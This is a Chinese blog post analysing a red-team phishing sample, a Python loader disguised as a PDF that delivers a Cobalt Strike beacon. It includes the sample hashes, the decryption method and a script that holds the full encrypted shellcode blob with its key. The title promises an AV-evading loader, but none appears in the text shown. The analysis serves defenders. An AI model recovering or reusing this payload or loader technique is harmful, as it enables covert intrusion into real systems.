记一次Hvv红队样本的简单分析-文末附免杀shellcode加载器

用户1789928

发布于 2021-04-29 15:37:46

1.3K0

发布于 2021-04-29 15:37:46

文章被收录于专栏：渗透测试红队专栏

温馨提示

本文章仅供学习交流使用，文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

感谢空白牛在Hvv期间的帮助~

邮件原文如下

解压后得到样本

XX内部旅游套餐方案.pdf.exe

样本为大小为5.88M,HASH如下

MD5
5bc32973b43593207626c0588fc6247e
SHA-1
551414cb283a56cf55817c720c2efee0144ea2ed
SHA-256
d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad

VT报毒 14/69，免杀效果尚可，过了大部分国产

通过Yara规则检测，为典型的Cobaltstrike x64 https beacon载荷

基于程序体积和逆向后获取到的函数判断

该恶意样本为Python编写的shellcodeloader加载CS https beacon X64 shellcode,后用py2exe程序封装成exe程序

对该程序进行逆向unpy2exe逆向分析，取得其源码

分析得出该恶意样本是通过rc4算法解密base64加密的shellcode

并且使用VirtualAlloc开辟内存空间放入内存中执行

编写shellcode解密脚本

import ctypes, urllib, base64, requests, hashlib
def rc4(text, key):
key = hashlib.md5(key).hexdigest()
text = base64.b64decode(text)
result = ''
key_len = len(key)
box = list(range(256))
j = 0
for i in range(256):
j = (j + box[i] + ord(key[(i % key_len)])) % 256
box[i], box[j] = box[j], box[i]

i = j = 0
for element in text:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
k = chr(element ^ box[((box[i] + box[j]) % 256)])
result += k

return result
b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
mm = 'king6666'
c = rc4(b, mm.encode('utf-8'))
code = bytearray(base64.b64decode(c))
print(code)

得到其shellcode